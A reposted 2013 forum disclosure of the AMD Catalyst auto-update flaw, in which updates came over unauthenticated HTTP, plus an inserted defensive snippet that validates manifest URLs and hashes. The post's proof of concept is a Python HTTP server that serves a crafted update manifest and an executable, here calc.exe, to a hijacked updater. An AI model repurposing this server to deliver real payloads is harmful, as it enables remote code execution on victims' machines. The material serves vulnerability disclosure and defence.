[Repost] AMD Catalyst auto-update program vulnerability
Posted on: 2013-4-28 11:59
On 17 January 2013, AMD released AMD Catalyst 13.1 and then announced that the automatic update feature had been removed. At the time AMD said this was because of a security problem in the auto-update feature. Recently the details of that problem surfaced online: the auto-update request can be hijacked with a man-in-the-middle attack.
The vulnerability exists because:
The binary is downloaded over HTTP.
AMD does not verify that the binary is signed before executing it.

This means that a man-in-the-middle attacker can intercept the request to the AMD support site and redirect it to an attacker-crafted page or program.
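An added example (not from this post, and not AMD's updater code) showing the checks an update client should apply to a manifest of this shape before running what it downloads: parse the ";#"-delimited multi-value fields, refuse download URLs that are not HTTPS on an allow-listed host, and compare the payload's SHA-256 with a digest that itself arrived over an authenticated channel. The manifest contents, host name and digest below are constructed placeholders.

```python
import hashlib
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed manifest in the shape the updater consumes; the URL is a placeholder.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<list>
  <Catalyst-Driver-Files>
    <Title>Catalyst Software Suite with .NET 4 Support</Title>
    <OSType>;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#</OSType>
    <RevisionNumber>12.42</RevisionNumber>
    <TextSingle1>http://update.example.invalid/catalyst-driver.exe</TextSingle1>
  </Catalyst-Driver-Files>
</list>
"""

# Hypothetical allow-list: the only host the client will fetch binaries from.
ALLOWED_HOSTS = {"update.example.invalid"}

def split_multi(value):
    """Split a ';#'-delimited multi-value field (';#A;#B;#') into ['A', 'B']."""
    return [v for v in (value or "").split(";#") if v]

def parse_manifest(text):
    """Return one dict per <Catalyst-Driver-Files> entry in the manifest."""
    root = ET.fromstring(text)
    return [{
        "title": node.findtext("Title", ""),
        "revision": node.findtext("RevisionNumber", ""),
        "os": split_multi(node.findtext("OSType")),
        "url": (node.findtext("TextSingle1") or "").strip(),
    } for node in root.findall("Catalyst-Driver-Files")]

def url_problems(url):
    """Policy violations for a download URL; an empty list means it may be fetched."""
    parts = urlparse(url)
    problems = []
    if parts.scheme != "https":  # plain HTTP is what made the MITM possible
        problems.append("scheme is not https")
    if parts.hostname not in ALLOWED_HOSTS:
        problems.append("host is not on the allow-list")
    return problems

def payload_is_trusted(data, expected_sha256):
    """Second check: only meaningful if expected_sha256 came from an authenticated
    source (HTTPS or a signed manifest); otherwise the attacker supplies both."""
    return hashlib.sha256(data).hexdigest() == expected_sha256.lower()
```

Both checks must pass before the downloaded file is executed; either one alone leaves one of the two root causes above in place.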
POC
# Python 2 script (SimpleHTTPServer/SocketServer became http.server/socketserver in Python 3)
import SimpleHTTPServer
import SocketServer

xml = """<?xml version="1.0" encoding="utf-8"?>
<list>
    <Catalyst-Driver-Files>
        <Title>Catalyst Software Suite with .NET 4 Support</Title>
        <DriverCategory>Full Catalyst Software Suite (Recommended)</DriverCategory>
        <DriverLanguage>;#All;#</DriverLanguage>
        <DriverProductType>;#1-Radeon;#3-Integrated;#18-AIW_HD;#</DriverProductType>
        <FileSize>184 MB</FileSize>
        <OSType>;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#</OSType>
        <ReleaseDate>2012-10-22T00:00:00-05:00</ReleaseDate>
        <RevisionNumber>12.42</RevisionNumber>
        <RollupSortOrder>15</RollupSortOrder>
        <TextMultiple1>
        </TextMultiple1>
        <!-- download URL: obfuscated by the forum in the original post; placeholder value here -->
        <TextSingle1>http://PLACEHOLDER-UPDATE-HOST/catalyst-driver.exe</TextSingle1>
        <TechDownloadGPUSubtype>Driver</TechDownloadGPUSubtype>
        <ContentType>GraphicsDriverFile</ContentType>
        <DriverVersionSupported>;#12.42;#</DriverVersionSupported>
        <ID>956</ID>
        <Modified>2012-10-22T21:30:52-05:00</Modified>
        <Created>2012-10-22T21:30:52-05:00</Created>
        <Author>System Account</Author>
        <Editor>System Account</Editor>
        <_UIVersionString>1.0</_UIVersionString>
        <Attachments>0</Attachments>
        <TitleCN>Catalyst Software Suite</TitleCN>
        <TitleBR>Catalyst Software Suite</TitleBR>
        <TitleDE>Catalyst Software Suite</TitleDE>
        <TitleFR>Catalyst Software Suite</TitleFR>
        <TitleIT>Catalyst Software Suite</TitleIT>
        <TitleLA>Catalyst Software Suite</TitleLA>
        <DescriptionCN>
        </DescriptionCN>
        <DescriptionBR>
        </DescriptionBR>
        <DescriptionDE>
        </DescriptionDE>
        <DescriptionFR>
        </DescriptionFR>
        <DescriptionIT>
        </DescriptionIT>
        <DescriptionLA>
        </DescriptionLA>
        <TitleKR>(Catalyst Software Suite)</TitleKR>
        <DescriptionKR>
        </DescriptionKR>
        <LinkTitleNoMenu>Catalyst Software Suite with .NET 4 Support</LinkTitleNoMenu>
        <LinkTitle>Catalyst Software Suite with .NET 4 Support</LinkTitle>
    </Catalyst-Driver-Files>
</list>
"""

class ExploitHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        # Requests for the update manifest get the crafted XML above
        if "catalystxml" in self.path:
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            self.wfile.write(xml)
            return
        # Requests for the driver binary get calc.exe, which the updater then runs
        elif ".exe" in self.path:
            self.send_response(200)
            self.send_header('Content-type', 'application/octet-stream')
            self.end_headers()
            f = open(r"C:\Windows\System32\calc.exe", "rb")
            self.wfile.write(f.read())
            f.close()
            return

# Listen on plain HTTP port 80, the protocol the updater uses
httpd = SocketServer.ThreadingTCPServer(('0.0.0.0', 80), ExploitHandler)
httpd.serve_forever()
This script points at amd.com,
Many applications may have this vulnerability; researchers abroad developed a tool, EvilGrade, that can find these security problems.
